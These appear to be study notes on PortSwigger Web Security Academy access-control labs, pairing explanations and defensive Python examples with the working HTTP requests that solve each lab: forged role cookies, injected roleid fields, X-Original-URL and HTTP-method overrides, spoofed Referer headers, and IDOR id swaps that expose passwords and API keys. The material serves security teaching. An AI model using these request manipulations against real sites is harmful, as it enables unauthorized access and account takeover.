Vertical Privilege Escalations

If a user can gain access to functionality that they are not permitted to access then this is vertical privilege escalation. For example, if a non-administrative user can gain access to an admin page where they can delete user accounts, then this is vertical privilege escalation.

Unprotected Functionality

The most basic form of vertical privilege escalation:

At its most basic, vertical privilege escalation arises where an application does not enforce any protection for sensitive functionality.
 
For example, a website might host sensitive functionality at the following URL:
 
`https://insecure-website.com/admin`
 
This might be accessible by any user, not only administrative users who have a link to the functionality in their user interface. In some cases, the administrative URL might be disclosed in other locations, such as the `robots.txt` file:
 
`https://insecure-website.com/robots.txt`

The URL may be hidden, but it can still be leaked in some way:

Hiding sensitive functionality does not provide effective access control because users might discover the obfuscated URL in a number of ways.
 
Imagine an application that hosts administrative functions at the following URL:
 
`https://insecure-website.com/administrator-panel-yb556`
 
This might not be directly guessable by an attacker. However, the application might still leak the URL to users in JavaScript files.
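The point of the passage above is that an obscured path is not a control; the only reliable fix is to require an explicit authorization rule on every handler and to audit for handlers that declare none. The following is an added example, not code from the page or from PortSwigger; the route registry, role names and the hidden path are constructed for illustration.

```python
# Added example (not from the PortSwigger page): a deny-by-default route
# registry. Every handler declares the role it needs, an audit lists handlers
# that declared nothing, and dispatch treats "nothing declared" as admin-only.
# Route names, roles and the registry itself are constructed for the example.
from typing import Callable, Dict, Optional

RANK = {"public": 0, "user": 1, "admin": 2}      # role hierarchy
ROUTES: Dict[str, dict] = {}                     # path -> handler + required role

def route(path: str, role: Optional[str] = None):
    """Register a handler. role=None means the author declared nothing."""
    def wrap(fn: Callable):
        ROUTES[path] = {"handler": fn, "role": role}
        return fn
    return wrap

def unprotected_routes(routes: Dict[str, dict]) -> list:
    """Paths with no declared requirement; a CI test asserts this is empty."""
    return sorted(p for p, r in routes.items() if r["role"] is None)

def dispatch(path: str, session: dict) -> tuple:
    """The role comes from server-side session state, never from the request,
    and an undeclared requirement falls back to the strictest role."""
    entry = ROUTES.get(path)
    if entry is None:
        return 404, "not found"
    required = entry["role"] or "admin"
    if RANK[session.get("role", "public")] < RANK[required]:
        return 403, "forbidden"
    return 200, entry["handler"]()

@route("/", role="public")
def home():
    return "home"

@route("/admin", role="admin")
def admin():
    return "admin"

# Hypothetical obscured admin path (constructed): the author hid the URL but
# forgot to declare a role, which the audit catches and dispatch still denies.
@route("/administrator-panel-yb556")
def hidden_admin_panel():
    return "admin panel"
```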

Lab: Unprotected Admin Functionality

Contents of robots.txt:

~~~
User-agent: *
Disallow: /administrator-panel
~~~

/administrator-panel can be accessed without authentication. Delete the user carlos to complete the lab.

Lab: Unprotected Admin Functionality with Unpredictable URL

The following code is found on the / page:

~~~html
<script>
    var isAdmin = false;
    if (isAdmin) {
        var topLinksTag = document.getElementsByClassName("top-links")[0];
        var adminPanelTag = document.createElement('a');
        adminPanelTag.setAttribute('href', '/admin-233j4q');
        adminPanelTag.innerText = 'Admin panel';
        topLinksTag.append(adminPanelTag);
        var pTag = document.createElement('p');
        pTag.innerText = '|';
        topLinksTag.appendChild(pTag);
    }
</script>
~~~

Visit /admin-233j4q and delete the user carlos to complete the lab.

Parameter-based Access Control Methods

Storing the user's access rights or role in a location the user can control can also lead to vertical privilege escalation:

Some applications determine the user's access rights or role at login, and then store this information in a user-controllable location. This could be:
- A hidden field.
- A cookie.
- A preset query string parameter.
 
The application makes access control decisions based on the submitted value. For example:
 
`https://insecure-website.com/login/home.jsp?admin=true`
`https://insecure-website.com/login/home.jsp?role=1`

Lab: User Role Controlled by Request Parameter

After logging in, two cookies are received:

~~~http
Cookie: session=wtJyCD9fUAG3vKHIsbydJIxfPxwj5hTH; Admin=false
~~~

Change Admin to true and the /admin page becomes accessible. Delete the user carlos to complete the lab.

Lab: User Role Can Be Modified in User Profile

Request used to change the email:

~~~http
POST /my-account/change-email HTTP/2
Host: 0aee00310426f20982e54868006500e7.web-security-academy.net
Cookie: session=IBmVAIQVh90KpntYkLigYhUVXH8Bh5Kc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Origin: https://0aee00310426f20982e54868006500e7.web-security-academy.net
Referer: https://0aee00310426f20982e54868006500e7.web-security-academy.net/my-account

{
  "email" : "wiener@administrator.net"
}
~~~

Response body:

~~~json
{
  "username" : "wiener",
  "email" : "wiener@administrator.net",
  "apikey" : "Z0I4U3cXcYuBI2eMVTbEzpFs51uDvGE9",
  "roleid" : 1
}
~~~

Try adding roleid to the request body:

~~~json
{
  "email" : "wiener@administrator.net",
  "roleid" : 2
}
~~~

and it turns out the roleid of the current user can be changed:

~~~json
{
  "username" : "wiener",
  "email" : "wiener@administrator.net",
  "apikey" : "Z0I4U3cXcYuBI2eMVTbEzpFs51uDvGE9",
  "roleid" : 2
}
~~~

Visit /admin and delete the user carlos to complete the lab.
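Both labs above fail for the same reason: the role is read from something the client sends (an Admin cookie, a roleid field merged into the profile). The following is an added example, not the lab's code, showing a change-email handler that trusts the request beside one that only copies allowlisted fields and takes the role from the server-side user record; the session store, user table and field names are constructed.

```python
# Added example (not from the page): the lab's change-email handler, first
# trusting client-supplied role data, then hardened. Session store, user
# records, cookie and field names are constructed for this example.
from typing import Tuple

SESSIONS = {"sess-wiener": {"user": "wiener"}}   # server-side session store

def fresh_users() -> dict:
    """Constructed user table; roleid 1 = normal user, 2 = administrator."""
    return {"wiener": {"username": "wiener", "email": "wiener@normal-user.net",
                       "apikey": "CONSTRUCTED-KEY", "roleid": 1}}

def change_email_vulnerable(users: dict, cookies: dict, body: dict) -> Tuple[int, dict]:
    """Merges every JSON field into the profile (mass assignment) and honours
    an Admin cookie, so '"roleid": 2' or 'Admin=true' escalates the caller."""
    user = users[SESSIONS[cookies["session"]]["user"]]
    user.update(body)                        # roleid rides along with email
    if cookies.get("Admin") == "true":
        user["roleid"] = 2
    return 200, user

WRITABLE_FIELDS = {"email"}                  # allowlist for profile updates

def change_email_hardened(users: dict, cookies: dict, body: dict) -> Tuple[int, dict]:
    """Copies only allowlisted fields; the role lives in the server-side user
    record and is never read from cookies or the request body."""
    user = users[SESSIONS[cookies["session"]]["user"]]
    extra = sorted(body.keys() - WRITABLE_FIELDS)
    if extra or "email" not in body:
        return 400, {"error": "only 'email' may be written; rejected: " + ", ".join(extra)}
    user["email"] = body["email"]
    return 200, {"username": user["username"], "email": user["email"]}  # no secrets echoed

def is_admin(users: dict, cookies: dict) -> bool:
    """Authorization decision from server state only; the Admin cookie is ignored."""
    return users[SESSIONS[cookies["session"]]["user"]]["roleid"] == 2
```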

Broken Access Control Resulting From Platform Misconfiguration

An application may block users of a given role (for example managers) from accessing a specific resource (POST /admin/deleteUser):

Some applications enforce access controls at the platform layer by restricting access to specific URLs and HTTP methods based on the user's role. For example, an application might configure a rule as follows:
 
`DENY: POST, /admin/deleteUser, managers`

Some frameworks allow this to be bypassed by overriding the requested URL through custom headers:

Some application frameworks support various non-standard HTTP headers that can be used to override the URL in the original request, such as `X-Original-URL` and `X-Rewrite-URL`. If a website uses rigorous front-end controls to restrict access based on the URL, but the application allows the URL to be overridden via a request header, then it might be possible to bypass the access controls using a request like the following:
 
~~~http
POST / HTTP/1.1
X-Original-URL: /admin/deleteUser
...
~~~

Alternatively, a different method can be used:

If an attacker can use the `GET` (or another) method to perform actions on a restricted URL, they can bypass the access control that is implemented at the platform layer.

Lab: URL-based Access Control Can Be Circumvented

Use the following request to access the /admin page:

~~~http
GET / HTTP/2
Host: 0a8000de044890718098997b002900ab.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Referer: https://0a8000de044890718098997b002900ab.web-security-academy.net/
X-Original-Url: /admin
~~~

Use the following request to delete the user carlos:

~~~http
GET /?username=carlos HTTP/2
Host: 0a8000de044890718098997b002900ab.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Referer: https://0a8000de044890718098997b002900ab.web-security-academy.net/
X-Original-Url: /admin/delete
~~~

Lab: Method-based Access Control Can Be Circumvented

Request used to upgrade the role:

~~~http
POST /admin-roles HTTP/2
Host: 0ab200f303fc2692807d492c00790045.web-security-academy.net
Cookie: session=E0Penp8hMvA8NdPy0YqFk0LFCLhFJLl2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0ab200f303fc2692807d492c00790045.web-security-academy.net
Referer: https://0ab200f303fc2692807d492c00790045.web-security-academy.net/admin

username=wiener&action=upgrade
~~~

When this request is sent with the cookie of wiener:peter, the following response is received:

~~~http
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"
~~~

Change the method to GET and move the body parameters into query parameters:

~~~http
GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0ab200f303fc2692807d492c00790045.web-security-academy.net
~~~

Send the request to complete the lab.

Broken Access Control Resulting From URL-Matching Discrepancies

Some applications are very strict about path matching for access control. If the access control component can be made to fail to match the path, it can be bypassed:

Websites can vary in how strictly they match the path of an incoming request to a defined endpoint. For example, they may tolerate inconsistent capitalization, so a request to `/ADMIN/DELETEUSER` may still be mapped to the `/admin/deleteUser` endpoint.
 
If the access control mechanism is less tolerant, it may treat these as two different endpoints and fail to enforce the correct restrictions as a result.

An example with the Spring framework:

Similar discrepancies can arise if developers using the Spring framework have enabled the `useSuffixPatternMatch` option. This allows paths with an arbitrary file extension to be mapped to an equivalent endpoint with no file extension. In other words, a request to `/admin/deleteUser.anything` would still match the `/admin/deleteUser` pattern. Prior to Spring 5.3, this option is enabled by default.

Another example:

On other systems, you may encounter discrepancies in whether `/admin/deleteUser` and `/admin/deleteUser/` are treated as distinct endpoints. In this case, you may be able to bypass access controls by appending a trailing slash to the path.
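The platform-layer bypasses above (X-Original-URL, a different method) and the matching discrepancies in this section share one root cause: the access control check looks at a different path, or a different method, than the one the router finally dispatches. The following is an added example, not from the page or any framework, of a check that normalizes the path the same way a suffix-tolerant, case-insensitive router would, applies the deny rule to every method, and refuses requests carrying override headers; the rule table and helper names are constructed.

```python
# Added example (not from the page): an access-control check that evaluates the
# same canonical path the router will dispatch, for every HTTP method, and
# never honours URL-override headers. Rule table and helpers are constructed.
import posixpath
from urllib.parse import urlsplit

# Deny rule keyed by canonical path prefix; applies to all methods.
DENY_PREFIXES = {"/admin": {"managers", "users", "anonymous"}}
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")

def canonical_path(raw_path: str, suffix_pattern_match: bool = True) -> str:
    """Normalize to the form the router matches on: query dropped, dot-segments
    collapsed, trailing slash removed, lower-cased, optional suffix stripped
    (mirrors Spring's useSuffixPatternMatch, where /x.anything matches /x)."""
    path = urlsplit(raw_path).path            # raw_path always starts with "/"
    path = posixpath.normpath("/" + path.strip("/")).lower()
    if suffix_pattern_match:
        last = path.rsplit("/", 1)[-1]
        if "." in last:
            path = path[: path.rfind(".")]
    return path

def is_denied(method: str, raw_path: str, role: str, headers: dict) -> bool:
    """True when the request must be refused. A client-supplied override
    header is rejected outright rather than used to re-route the request."""
    if any(h.lower() in OVERRIDE_HEADERS for h in headers):
        return True
    path = canonical_path(raw_path)
    for prefix, roles in DENY_PREFIXES.items():
        if (path == prefix or path.startswith(prefix + "/")) and role in roles:
            return True                        # method deliberately not consulted
    return False
```

`/administrator` is not denied by the `/admin` rule because the prefix match is segment-aware, not a plain string prefix.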

Horizontal Privilege Escalation

Horizontal privilege escalation occurs if a user is able to gain access to resources belonging to another user, instead of their own resources of that type. For example, if an employee can access the records of other employees as well as their own, then this is horizontal privilege escalation.

The most basic way to exploit horizontal privilege escalation:

Horizontal privilege escalation attacks may use similar types of exploit methods to vertical privilege escalation. For example, a user might access their own account page using the following URL:
 
`https://insecure-website.com/myaccount?id=123`
 
If an attacker modifies the `id` parameter value to that of another user, they might gain access to another user's account page, and the associated data and functions.

Even if the application uses GUIDs to identify users, it is not necessarily safe, because the GUIDs may be disclosed somewhere else in the application:

For example, instead of an incrementing number, an application might use globally unique identifiers (GUIDs) to identify users. This may prevent an attacker from guessing or predicting another user's identifier. However, the GUIDs belonging to other users might be disclosed elsewhere in the application where users are referenced, such as user messages or reviews.

If the application rejects the request and redirects to the login page, but the response still contains information about the user, it is still considered an access control vulnerability:

In some cases, an application does detect when the user is not permitted to access the resource, and returns a redirect to the login page. However, the response containing the redirect might still include some sensitive data belonging to the targeted user, so the attack is still successful.

Lab: User ID Controlled by Request Parameter

Log in with the account wiener:peter and send a request to /my-account?id=carlos to obtain the API key.

Lab: User ID Controlled by Request Parameter, with Unpredictable User IDs

When viewing the page /post?postId=3, the following HTML containing a GUID is found:

~~~html
<span id=blog-author><a href='/blogs?userId=8d8c3ecd-7c15-44fa-b240-9b725b06e82e'>carlos</a></span>
~~~

Log in and visit /blogs?userId=8d8c3ecd-7c15-44fa-b240-9b725b06e82e to obtain the API key.

Lab: User ID Controlled by Request Parameter with Data Leakage in Redirect

The redirect response contains HTML with the user's information:

~~~html
<p>Your username is: carlos</p>
<div>
    Your API Key is: ukujEDz4tqCNdJiz5Ksa2MQkRnYHB0bE
</div>
~~~

Horizontal to Vertical Privilege Escalation

Horizontal privilege escalation can lead to vertical privilege escalation if a privileged account can be taken over:

Often, a horizontal privilege escalation attack can be turned into a vertical privilege escalation, by compromising a more privileged user.
 
For example, a horizontal escalation might allow an attacker to reset or capture the password belonging to another user.

Lab: User ID Controlled by Request Parameter with Password Disclosure

The page /my-account?id=wiener contains the credentials of user wiener in an input tag as follows:

~~~html
<input required type=password name=password value='peter'/>
~~~

Visiting /my-account?id=administrator shows the following password:

~~~html
<input required type=password name=password value='lhmjvurse15j6hjous3b'/>
~~~

Log in as administrator:lhmjvurse15j6hjous3b and delete the user carlos to complete the lab.

Insecure Direct Object References

Insecure direct object references (IDORs) are a subcategory of access control vulnerabilities. IDORs occur if an application uses user-supplied input to access objects directly and an attacker can modify the input to obtain unauthorized access.
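Whether the identifier is a sequential number, a username or a GUID is beside the point: the handler must resolve the object by the supplied id and then decide whether the session user owns it, and a denial must not carry the object's data along in a redirect body. The following added example (not the lab's code) covers the account page and the transcript download from this page; users, transcripts and secret values are constructed.

```python
# Added example (not from the page): object access that resolves the record by
# the supplied id and then checks ownership against the server-side session,
# denying with a body-less redirect. Users, transcripts and ids are constructed.
from typing import Optional

USERS = {
    "wiener": {"apikey": "KEY-WIENER-CONSTRUCTED", "password": "peter"},
    "carlos": {"apikey": "KEY-CARLOS-CONSTRUCTED", "password": "constructed-secret"},
}
# file name -> (owner, contents); names mirror /download-transcript/<n>.txt
TRANSCRIPTS = {"1.txt": ("carlos", "chat log of carlos"),
               "3.txt": ("wiener", "chat log of wiener")}

def account_page(session_user: Optional[str], requested: str) -> tuple:
    """GET /my-account?id=<user>: the id is only a lookup key; the decision is
    whether the session user owns (or administers) the resulting record."""
    if session_user is None:
        return 302, {"Location": "/login"}, ""      # no data rides along
    target = USERS.get(requested)
    if target is None:
        return 404, {}, ""
    if requested != session_user and session_user != "administrator":
        return 302, {"Location": "/login"}, ""      # same shape as unauthenticated
    # The password is never part of the page model, so it cannot leak into markup.
    return 200, {}, {"username": requested, "apikey": target["apikey"]}

def download_transcript(session_user: Optional[str], name: str) -> tuple:
    """GET /download-transcript/<name>: same ownership rule for files; a
    foreign or missing file is indistinguishable from the caller's view."""
    entry = TRANSCRIPTS.get(name)
    if session_user is None or entry is None or entry[0] != session_user:
        return 404, {}, ""
    return 200, {"Content-Disposition": f'attachment; filename="{name}"'}, entry[1]
```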

Lab: Insecure Direct Object References

When using the download transcript feature, the URL has the following form:

`https://0af1007403cd2f9a80f14054001a00ae.web-security-academy.net/download-transcript/3.txt`

And the numbering starts at 2.txt rather than 1.txt.

Changing 3 to 1 yields a response containing a password, as follows:

~~~http
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="1.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 520

CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is 6hty1zfxme8v42y4dspe. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!
~~~

Log in with the account carlos:6hty1zfxme8v42y4dspe to complete the lab.

Access Control Vulnerabilities in Multi-step Processes

If the application lacks access control on even one step of a multi-step function, it can also be attacked:

For example, the administrative function to update user details might involve the following steps:
1. Load the form that contains details for a specific user.
2. Submit the changes.
3. Review the changes and confirm.
 
Sometimes, a website will implement rigorous access controls over some of these steps, but ignore others. 
 
Imagine a website where access controls are correctly applied to the first and second steps, but not to the third step. An attacker can gain unauthorized access to the function by skipping the first two steps and directly submitting the request for the third step with the required parameters.
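The defence for the multi-step case is to repeat the authorization check on every step and to bind the confirmation step to a pending action that the same session created in the earlier step, so a confirmation request submitted on its own has nothing to confirm. The following is an added example (not the lab's code) of a two-step role upgrade built that way; the session store, user table and token handling are constructed.

```python
# Added example (not from the page): a two-step "upgrade role" flow in which
# the confirm step re-checks the caller's role and only accepts an action that
# the same session started in step one. Sessions, users and tokens are constructed.
import secrets
from typing import Dict, Optional

USERS = {"administrator": {"role": "admin"}, "wiener": {"role": "user"}, "carlos": {"role": "user"}}
SESSIONS = {"S-ADMIN": {"user": "administrator"}, "S-WIENER": {"user": "wiener"}}
PENDING: Dict[str, dict] = {}   # session cookie -> pending action (server side only)

def _require_admin(session: str) -> Optional[str]:
    """Role comes from the server-side user record, never from the request."""
    user = SESSIONS.get(session, {}).get("user")
    return user if user and USERS[user]["role"] == "admin" else None

def start_upgrade(session: str, username: str) -> tuple:
    """Step 1: POST /admin-roles with username and action=upgrade."""
    if _require_admin(session) is None:
        return 401, "Unauthorized"
    token = secrets.token_urlsafe(16)
    PENDING[session] = {"username": username, "action": "upgrade", "token": token}
    return 200, token          # rendered into the confirmation form as a hidden field

def confirm_upgrade(session: str, username: str, token: str) -> tuple:
    """Step 2: POST /admin-roles with confirmed=true. The authorization check is
    repeated, and the parameters must match the action this session started."""
    if _require_admin(session) is None:
        return 401, "Unauthorized"
    pending = PENDING.get(session)
    if (not pending or not secrets.compare_digest(pending["token"], token)
            or pending["username"] != username):
        return 400, "No matching pending action"
    del PENDING[session]       # single use
    USERS[username]["role"] = "admin"
    return 200, f"{username} upgraded"
```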

Lab: Multi-step Process with No Access Control on One Step

Request used to upgrade the role:

~~~http
POST /admin-roles HTTP/2
Host: 0a7900db03f9c0bb811252590030005b.web-security-academy.net
Cookie: session=KSKtZjhlBATCw56jmmGWpfAMnF31zNEL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://0a7900db03f9c0bb811252590030005b.web-security-academy.net
Referer: https://0a7900db03f9c0bb811252590030005b.web-security-academy.net/admin-roles

username=carlos&action=upgrade
~~~

Request used to confirm:

~~~http
POST /admin-roles HTTP/2
Host: 0a7900db03f9c0bb811252590030005b.web-security-academy.net
Cookie: session=KSKtZjhlBATCw56jmmGWpfAMnF31zNEL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a7900db03f9c0bb811252590030005b.web-security-academy.net
Referer: https://0a7900db03f9c0bb811252590030005b.web-security-academy.net/admin

action=upgrade&confirmed=true&username=carlos
~~~

Use the cookie of wiener:peter in the confirmation request to self-upgrade with the following parameters:

~~~http
action=upgrade&confirmed=true&username=wiener
~~~

Referer-based Access Control

Some applications base access control on the Referer header, and this can be bypassed because an attacker can edit the header with a proxy:

Some websites base access controls on the `Referer` header submitted in the HTTP request. The `Referer` header can be added to requests by browsers to indicate which page initiated a request.
 
For example, an application robustly enforces access control over the main administrative page at `/admin`, but for sub-pages such as `/admin/deleteUser` only inspects the `Referer` header. If the `Referer` header contains the main `/admin` URL, then the request is allowed.

Lab: Referer-based Access Control

The /admin page is access-controlled when using the account wiener:peter.

Request used to upgrade the role:

~~~http
GET /admin-roles?username=carlos&action=upgrade HTTP/2
Host: 0a62000f033d7793804103e90060006e.web-security-academy.net
Cookie: session=pFh24ubvigdIN7uMb1JvciEc3MHSTcFW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
~~~

However, when the above request is sent using the account wiener:peter with the following Referer header, it succeeds:

~~~http
Referer: https://0a62000f033d7793804103e90060006e.web-security-academy.net/admin
~~~

If the Referer does not end in /admin but in some other value such as /ad, the response is:

~~~http
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"
~~~

Location-based Access Control

Location-based access control can be bypassed using a proxy, a VPN, or client-side geolocation manipulation:

Some websites enforce access controls based on the user's geographical location. This can apply, for example, to banking applications or media services where state legislation or business restrictions apply. These access controls can often be circumvented by the use of web proxies, VPNs, or manipulation of client-side geolocation mechanisms.

Resources